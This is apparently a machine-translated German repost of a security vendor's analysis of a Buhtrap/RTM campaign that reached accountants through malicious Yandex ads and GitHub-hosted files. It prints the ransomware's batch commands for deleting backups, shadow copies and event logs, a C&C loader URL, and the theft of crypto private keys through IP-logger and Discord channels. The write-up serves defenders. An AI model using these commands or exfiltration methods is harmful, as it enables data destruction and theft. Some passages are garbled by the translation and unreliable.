Um Buchhalter bei einem Cyberangriff gezielt anzugreifen, können Sie Arbeitsdokumente verwenden, nach denen sie online suchen. Das ist in etwa das, was eine Cyber-Gruppe in den letzten Monaten getan hat, indem sie bekannte Hintertüren verbreitet hat. и sowie Verschlüsselungsgeräte und Software zum Diebstahl von Kryptowährungen. Die meisten Ziele befinden sich in Russland. Der Angriff wurde durch die Platzierung bösartiger Werbung auf Yandex.Direct durchgeführt. Potenzielle Opfer wurden auf eine Website weitergeleitet, auf der sie aufgefordert wurden, eine als Dokumentvorlage getarnte Schaddatei herunterzuladen. Yandex hat die schädliche Werbung nach unserer Warnung entfernt.
Der Quellcode von Buhtrap wurde in der Vergangenheit online durchgesickert, sodass jeder ihn verwenden kann. Wir haben keine Informationen zur Verfügbarkeit des RTM-Codes.
In diesem Beitrag erzählen wir Ihnen, wie die Angreifer Malware über Yandex.Direct verbreiteten und auf GitHub hosteten. Der Beitrag endet mit einer technischen Analyse der Malware.
Buhtrap und RTM sind wieder im Geschäft
Ausbreitungsmechanismus und Opfer
Die verschiedenen an die Opfer gelieferten Nutzlasten nutzen einen gemeinsamen Ausbreitungsmechanismus. Alle von den Angreifern erstellten Schaddateien wurden in zwei verschiedenen GitHub-Repositorys abgelegt.
Typischerweise enthielt das Repository eine herunterladbare schädliche Datei, die sich häufig änderte. Da Sie mit GitHub den Verlauf der Änderungen an einem Repository anzeigen können, können wir sehen, welche Malware in einem bestimmten Zeitraum verbreitet wurde. Um das Opfer davon zu überzeugen, die Schaddatei herunterzuladen, wurde die in der Abbildung oben gezeigte Website blanki-shabloni24[.]ru genutzt.
Das Design der Website und alle Namen der Schaddateien folgen einem einzigen Konzept – Formulare, Vorlagen, Verträge, Muster usw. Angesichts der Tatsache, dass Buhtrap- und RTM-Software in der Vergangenheit bereits bei Angriffen auf Buchhalter eingesetzt wurden, gingen wir davon aus, dass die Die Strategie in der neuen Kampagne ist dieselbe. Die Frage ist nur, wie das Opfer auf die Website der Angreifer gelangt ist.
Infektion
Zumindest mehrere potenzielle Opfer, die auf dieser Seite gelandet sind, wurden durch böswillige Werbung angelockt. Nachfolgend finden Sie eine Beispiel-URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Wie Sie dem Link entnehmen können, wurde das Banner im legitimen Buchhaltungsforum bb.f2[.]kz gepostet. Es ist wichtig zu beachten, dass die Banner auf verschiedenen Websites erschienen, alle dieselbe Kampagnen-ID (blanki_rsya) hatten und sich die meisten auf Buchhaltungs- oder Rechtshilfedienste bezogen. Aus der URL geht hervor, dass das potenzielle Opfer die Anfrage „Rechnungsformular herunterladen“ verwendet hat, was unsere Hypothese gezielter Angriffe stützt. Nachfolgend finden Sie die Websites, auf denen die Banner erschienen sind, und die entsprechenden Suchanfragen.
- Rechnungsformular herunterladen – bb.f2[.]kz
- Mustervertrag - Ipopen[.]ru
- Muster einer Bewerbungsbeschwerde – 77metrov[.]ru
- Vertragsformular - blank-dogovor-kupli-prodazhi[.]ru
- Musterantrag für ein Gericht – zen.yandex[.]ru
- Musterbeschwerde – yurday[.]ru
- Mustervertragsformulare – Regforum[.]ru
- Vertragsformular – assistentus[.]ru
- Muster-Wohnungsvertrag – napravah[.]com
- Muster rechtsgültiger Verträge - avito[.]ru
Die Website blanki-shabloni24[.]ru wurde möglicherweise so konfiguriert, dass sie eine einfache visuelle Bewertung besteht. Normalerweise wirkt eine Anzeige, die auf eine professionell aussehende Website mit einem Link zu GitHub verweist, nicht offensichtlich schlecht. Darüber hinaus haben die Angreifer nur für einen begrenzten Zeitraum, wahrscheinlich während der Kampagne, schädliche Dateien in das Repository hochgeladen. Meistens enthielt das GitHub-Repository ein leeres Zip-Archiv oder eine leere EXE-Datei. So konnten Angreifer über Yandex.Direct Werbung auf Websites verbreiten, die höchstwahrscheinlich von Buchhaltern besucht wurden, die als Antwort auf bestimmte Suchanfragen kamen.
Schauen wir uns als Nächstes die verschiedenen auf diese Weise verteilten Nutzlasten an.
Nutzlastanalyse
Chronologie der Verbreitung
Die bösartige Kampagne begann Ende Oktober 2018 und ist zum Zeitpunkt des Verfassens dieses Artikels aktiv. Da das gesamte Repository auf GitHub öffentlich verfügbar war, haben wir eine genaue Zeitleiste der Verbreitung von sechs verschiedenen Malware-Familien erstellt (siehe Abbildung unten). Wir haben eine Zeile hinzugefügt, die anzeigt, wann der Banner-Link entdeckt wurde, gemessen durch ESET-Telemetrie, zum Vergleich mit dem Git-Verlauf. Wie Sie sehen, korreliert dies gut mit der Verfügbarkeit der Nutzlast auf GitHub. Die Diskrepanz Ende Februar lässt sich dadurch erklären, dass wir einen Teil der Änderungshistorie nicht hatten, da das Repository von GitHub entfernt wurde, bevor wir es vollständig erhalten konnten.
Abbildung 1. Chronologie der Malware-Verbreitung.
Code Signing-Zertifikate
Die Kampagne verwendete mehrere Zertifikate. Einige wurden von mehr als einer Malware-Familie signiert, was ein weiterer Hinweis darauf ist, dass verschiedene Samples zu derselben Kampagne gehörten. Trotz der Verfügbarkeit des privaten Schlüssels haben die Betreiber die Binärdateien nicht systematisch signiert und den Schlüssel nicht für alle Proben verwendet. Ende Februar 2019 begannen Angreifer, ungültige Signaturen mithilfe eines Google-eigenen Zertifikats zu erstellen, für das sie nicht über den privaten Schlüssel verfügten.
Alle an der Kampagne beteiligten Zertifikate und die von ihnen signierten Malware-Familien sind in der folgenden Tabelle aufgeführt.
Wir haben diese Codesignaturzertifikate auch verwendet, um Verbindungen zu anderen Malware-Familien herzustellen. Für die meisten Zertifikate haben wir keine Beispiele gefunden, die nicht über ein GitHub-Repository verteilt wurden. Allerdings wurde das TOV-Zertifikat „MARIYA“ verwendet, um Schadsoftware zu signieren, die zum Botnetz gehörte , Adware und Miner. Es ist unwahrscheinlich, dass diese Malware mit dieser Kampagne zusammenhängt. Höchstwahrscheinlich wurde das Zertifikat im Darknet gekauft.
Win32/Filecoder.Buhtrap
Die erste Komponente, die unsere Aufmerksamkeit erregte, war das neu entdeckte Win32/Filecoder.Buhtrap. Dies ist eine Delphi-Binärdatei, die manchmal gepackt wird. Die Verteilung erfolgte hauptsächlich im Februar–März 2019. Es verhält sich wie es sich für ein Ransomware-Programm gehört – es durchsucht lokale Laufwerke und Netzwerkordner und verschlüsselt die erkannten Dateien. Es ist nicht erforderlich, dass eine Internetverbindung kompromittiert wird, da der Server nicht kontaktiert wird, um Verschlüsselungsschlüssel zu senden. Stattdessen fügt es am Ende der Lösegeldnachricht ein „Token“ hinzu und schlägt vor, die Betreiber per E-Mail oder Bitmessage zu kontaktieren.
Um so viele sensible Ressourcen wie möglich zu verschlüsseln, führt Filecoder.Buhtrap einen Thread aus, der darauf ausgelegt ist, wichtige Software herunterzufahren, die möglicherweise offene Dateihandler enthält, die wertvolle Informationen enthalten, die die Verschlüsselung beeinträchtigen könnten. Die Zielprozesse sind hauptsächlich Datenbankmanagementsysteme (DBMS). Darüber hinaus löscht Filecoder.Buhtrap Protokolldateien und Backups, um die Datenwiederherstellung zu erschweren. Führen Sie dazu das folgende Batch-Skript aus.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap nutzt einen legitimen Online-IP-Logger-Dienst, der darauf ausgelegt ist, Informationen über Website-Besucher zu sammeln. Dies dient dazu, Opfer der Ransomware aufzuspüren, wofür die Kommandozeile zuständig ist:
mshta.exe "javascript:document.write('');"
Dateien zur Verschlüsselung werden ausgewählt, wenn sie nicht mit drei Ausschlusslisten übereinstimmen. Erstens werden Dateien mit den folgenden Erweiterungen nicht verschlüsselt: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys und .Schläger. Zweitens werden alle Dateien ausgeschlossen, deren vollständiger Pfad Verzeichniszeichenfolgen aus der folgenden Liste enthält.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Drittens sind auch bestimmte Dateinamen von der Verschlüsselung ausgenommen, darunter der Dateiname der Lösegeldnachricht. Die Liste ist unten aufgeführt. Offensichtlich dienen alle diese Ausnahmen dazu, die Maschine am Laufen zu halten, allerdings mit minimaler Verkehrstauglichkeit.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Dateiverschlüsselungsschema
Nach der Ausführung generiert die Malware ein 512-Bit-RSA-Schlüsselpaar. Der private Exponent (d) und Modul (n) werden dann mit einem fest codierten öffentlichen 2048-Bit-Schlüssel (öffentlicher Exponent und Modul) verschlüsselt, zlib-gepackt und Base64-codiert. Der dafür verantwortliche Code ist in Abbildung 2 dargestellt.
Abbildung 2. Ergebnis der Hex-Rays-Dekompilierung des 512-Bit-RSA-Schlüsselpaargenerierungsprozesses.
Unten sehen Sie ein Beispiel für Klartext mit einem generierten privaten Schlüssel, bei dem es sich um ein Token handelt, das an die Lösegeldnachricht angehängt ist.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Der öffentliche Schlüssel der Angreifer ist unten angegeben.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Die Dateien werden mit AES-128-CBC mit einem 256-Bit-Schlüssel verschlüsselt. Für jede verschlüsselte Datei werden ein neuer Schlüssel und ein neuer Initialisierungsvektor generiert. Die Schlüsselinformationen werden am Ende der verschlüsselten Datei hinzugefügt. Betrachten wir das Format der verschlüsselten Datei.
Verschlüsselte Dateien haben den folgenden Header:
Die Quelldateidaten mit dem Zusatz des magischen VEGA-Werts werden bis zu den ersten 0x5000 Bytes verschlüsselt. Alle Entschlüsselungsinformationen werden an eine Datei mit folgender Struktur angehängt:
– Die Dateigrößenmarkierung enthält eine Markierung, die angibt, ob die Datei größer als 0x5000 Byte ist
— AES-Schlüsselblob = ZlibCompress(RSAEncrypt(AES-Schlüssel + IV, öffentlicher Schlüssel des generierten RSA-Schlüsselpaars))
- RSA-Schlüsselblob = ZlibCompress(RSAEncrypt(generierter privater RSA-Schlüssel, hartcodierter öffentlicher RSA-Schlüssel))
Win32/ClipBanker
Win32/ClipBanker ist eine Komponente, die zeitweise von Ende Oktober bis Anfang Dezember 2018 verteilt wurde. Seine Aufgabe besteht darin, den Inhalt der Zwischenablage zu überwachen und nach Adressen von Kryptowährungs-Wallets zu suchen. Nachdem die Ziel-Wallet-Adresse ermittelt wurde, ersetzt ClipBanker diese durch eine Adresse, von der angenommen wird, dass sie den Betreibern gehört. Die von uns untersuchten Proben waren weder verpackt noch verschleiert. Der einzige Mechanismus zur Maskierung des Verhaltens ist die String-Verschlüsselung. Betreiber-Wallet-Adressen werden mit RC4 verschlüsselt. Ziel-Kryptowährungen sind Bitcoin, Bitcoin Cash, Dogecoin, Ethereum und Ripple.
Während sich die Malware auf die Bitcoin-Wallets der Angreifer ausbreitete, wurde ein kleiner Betrag an VTS gesendet, was Zweifel am Erfolg der Kampagne aufkommen lässt. Darüber hinaus gibt es keine Hinweise darauf, dass diese Transaktionen überhaupt mit ClipBanker in Zusammenhang standen.
Win32/RTM
Die Win32/RTM-Komponente wurde Anfang März 2019 mehrere Tage lang verteilt. RTM ist ein in Delphi geschriebener Banktrojaner, der auf Remote-Banking-Systeme abzielt. Im Jahr 2017 veröffentlichten ESET-Forscher Für dieses Programm ist die Beschreibung immer noch relevant. Im Januar 2019 veröffentlichte auch Palo Alto Networks .
Buhtrap-Lader
Auf GitHub war einige Zeit lang ein Downloader verfügbar, der den früheren Buhtrap-Tools nicht ähnelte. Er dreht sich um https://94.100.18[.]67/RSS.php?<some_id> um die nächste Stufe zu erhalten und lädt sie direkt in den Speicher. Wir können zwei Verhaltensweisen des Codes der zweiten Stufe unterscheiden. In der ersten URL hat RSS.php die Buhtrap-Hintertür direkt übergeben – diese Hintertür ist derjenigen sehr ähnlich, die verfügbar war, nachdem der Quellcode durchgesickert war.
Interessanterweise sehen wir mehrere Kampagnen mit der Buhtrap-Hintertür, die angeblich von verschiedenen Betreibern durchgeführt werden. In diesem Fall besteht der Hauptunterschied darin, dass die Hintertür direkt in den Speicher geladen wird und nicht das übliche Schema des DLL-Bereitstellungsprozesses verwendet, über das wir gesprochen haben . Darüber hinaus änderten die Betreiber den RC4-Schlüssel, der zur Verschlüsselung des Netzwerkverkehrs zum C&C-Server verwendet wird. In den meisten Kampagnen, die wir gesehen haben, haben sich die Betreiber nicht die Mühe gemacht, diesen Schlüssel zu ändern.
Das zweite, komplexere Verhalten bestand darin, dass die RSS.php-URL an einen anderen Loader übergeben wurde. Es wurden einige Verschleierungsmaßnahmen implementiert, beispielsweise die Neuerstellung der dynamischen Importtabelle. Der Zweck des Bootloaders besteht darin, Kontakt zum C&C-Server aufzunehmen [.]com/api/F27F84EDA4D13B15/2, senden Sie die Protokolle und warten Sie auf eine Antwort. Es verarbeitet die Antwort als Blob, lädt sie in den Speicher und führt sie aus. Die Nutzlast, die wir bei der Ausführung dieses Laders sahen, war dieselbe Buhtrap-Hintertür, es könnten jedoch andere Komponenten vorhanden sein.
Android/Spy.Banker
Interessanterweise wurde auch eine Komponente für Android im GitHub-Repository gefunden. Er war nur einen Tag in der Hauptfiliale – den 1. November 2018. Abgesehen von der Veröffentlichung auf GitHub findet ESET Telemetry keine Hinweise auf die Verbreitung dieser Malware.
Die Komponente wurde als Android Application Package (APK) gehostet. Es ist stark verschleiert. Das böswillige Verhalten ist in einem verschlüsselten JAR im APK verborgen. Es wird mit RC4 mit diesem Schlüssel verschlüsselt:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Zum Verschlüsseln von Zeichenfolgen werden derselbe Schlüssel und Algorithmus verwendet. JAR befindet sich in APK_ROOT + image/files. Die ersten 4 Bytes der Datei enthalten die Länge des verschlüsselten JAR, die unmittelbar nach dem Längenfeld beginnt.
Nachdem wir die Datei entschlüsselt hatten, stellten wir fest, dass es sich zuvor um Anubis handelte Bankier für Android. Die Schadsoftware weist folgende Merkmale auf:
- Aufnahme über ein Mikrofon
- Screenshots machen
- GPS-Koordinaten abrufen
- Keylogger
- Gerätedatenverschlüsselung und Lösegeldforderung
- spammen
Interessanterweise nutzte der Banker Twitter als Backup-Kommunikationskanal, um einen weiteren C&C-Server zu erhalten. Das von uns analysierte Beispiel nutzte das @JonesTrader-Konto, das jedoch zum Zeitpunkt der Analyse bereits gesperrt war.
Der Banker enthält eine Liste der Zielanwendungen auf dem Android-Gerät. Sie ist länger als die in der Sophos-Studie ermittelte Liste. Die Liste umfasst viele Bankanwendungen, Online-Shopping-Programme wie Amazon und eBay sowie Kryptowährungsdienste.
MSIL/ClipBanker.IH
Die letzte im Rahmen dieser Kampagne verteilte Komponente war die ausführbare .NET-Windows-Datei, die im März 2019 erschien. Die meisten der untersuchten Versionen wurden mit ConfuserEx v1.0.0 gepackt. Wie ClipBanker verwendet diese Komponente die Zwischenablage. Sein Ziel ist ein breites Angebot an Kryptowährungen, sowie Angebote auf Steam. Darüber hinaus nutzt er den IP-Logger-Dienst, um den privaten WIF-Schlüssel von Bitcoin zu stehlen.
Schutzmechanismen
Zusätzlich zu den Vorteilen, die ConfuserEx bei der Verhinderung von Debugging, Dumping und Manipulation bietet, umfasst die Komponente die Fähigkeit, Antivirenprodukte und virtuelle Maschinen zu erkennen.
Um zu überprüfen, ob es in einer virtuellen Maschine ausgeführt wird, verwendet die Malware die integrierte Windows WMI-Befehlszeile (WMIC), um BIOS-Informationen anzufordern, nämlich:
wmic bios
Anschließend analysiert das Programm die Befehlsausgabe und sucht nach Schlüsselwörtern: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Um Antivirenprodukte zu erkennen, sendet Malware eine WMI-Anfrage (Windows Management Instrumentation) an das Windows-Sicherheitscenter ManagementObjectSearcher API wie unten gezeigt. Nach der Decodierung von Base64 sieht der Aufruf so aus:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Abbildung 3. Prozess zur Identifizierung von Antivirenprodukten.
Darüber hinaus prüft die Schadsoftware, ob , ein Tool zum Schutz vor Angriffen auf die Zwischenablage, das, wenn es ausgeführt wird, alle Threads in diesem Prozess anhält und dadurch den Schutz deaktiviert.
Beharrlichkeit
Die von uns untersuchte Malware-Version kopiert sich selbst %APPDATA%googleupdater.exe und setzt das „hidden“-Attribut für das Google-Verzeichnis. Dann ändert sie den Wert SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell in der Windows-Registrierung und fügt den Pfad hinzu updater.exe. Auf diese Weise wird die Malware jedes Mal ausgeführt, wenn sich der Benutzer anmeldet.
Böswilliges Verhalten
Wie ClipBanker überwacht die Malware den Inhalt der Zwischenablage, sucht nach Kryptowährungs-Wallet-Adressen und ersetzt diese, wenn sie gefunden werden, durch eine der Adressen des Betreibers. Nachfolgend finden Sie eine Liste der Zieladressen, die auf dem basiert, was im Code gefunden wird.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Für jeden Adresstyp gibt es einen entsprechenden regulären Ausdruck. Der STEAM_URL-Wert wird zum Angriff auf das Steam-System verwendet, wie aus dem regulären Ausdruck ersichtlich ist, der zur Definition im Puffer verwendet wird:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltrationskanal
Die Malware ersetzt nicht nur Adressen im Puffer, sondern zielt auch auf die privaten WIF-Schlüssel von Bitcoin-, Bitcoin Core- und Electrum-Bitcoin-Wallets ab. Das Programm nutzt plogger.org als Exfiltrationskanal, um den privaten WIF-Schlüssel zu erhalten. Dazu fügen Betreiber private Schlüsseldaten zum User-Agent-HTTP-Header hinzu, wie unten gezeigt.
Abbildung 4. IP-Logger-Konsole mit Ausgabedaten.
Die Betreiber nutzten iplogger.org nicht, um Wallets zu exfiltrieren. Aufgrund der Beschränkung auf 255 Zeichen im Feld haben sie wahrscheinlich auf eine andere Methode zurückgegriffen User-Agentwird in der IP-Logger-Weboberfläche angezeigt. In den von uns untersuchten Beispielen wurde der andere Ausgabeserver in der Umgebungsvariablen gespeichert DiscordWebHook. Überraschenderweise ist diese Umgebungsvariable nirgendwo im Code zugewiesen. Dies deutet darauf hin, dass sich die Schadsoftware noch in der Entwicklung befindet und die Variable der Testmaschine des Betreibers zugeordnet ist.
Es gibt ein weiteres Anzeichen dafür, dass sich das Programm in der Entwicklung befindet. Die Binärdatei enthält zwei iplogger.org-URLs und beide werden abgefragt, wenn Daten herausgefiltert werden. Bei einer Anfrage an eine dieser URLs wird dem Wert im Referrer-Feld „DEV /“ vorangestellt. Wir haben auch eine Version gefunden, die nicht mit ConfuserEx gepackt wurde. Der Empfänger für diese URL heißt DevFeedbackUrl. Basierend auf dem Namen der Umgebungsvariablen glauben wir, dass die Betreiber planen, den legitimen Dienst Discord und sein Web-Abhörsystem zu nutzen, um Kryptowährungs-Wallets zu stehlen.
Abschluss
Diese Kampagne ist ein Beispiel für den Einsatz legitimer Werbedienste bei Cyberangriffen. Der Plan zielt auf russische Organisationen ab, aber wir wären nicht überrascht, wenn ein solcher Angriff nichtrussische Dienste in Anspruch nehmen würde. Um eine Gefährdung zu vermeiden, müssen Benutzer auf den Ruf der Quelle der heruntergeladenen Software vertrauen können.
Eine vollständige Liste der Kompromittierungsindikatoren und MITRE ATT&CK-Attribute finden Sie unter .
Source: habr.com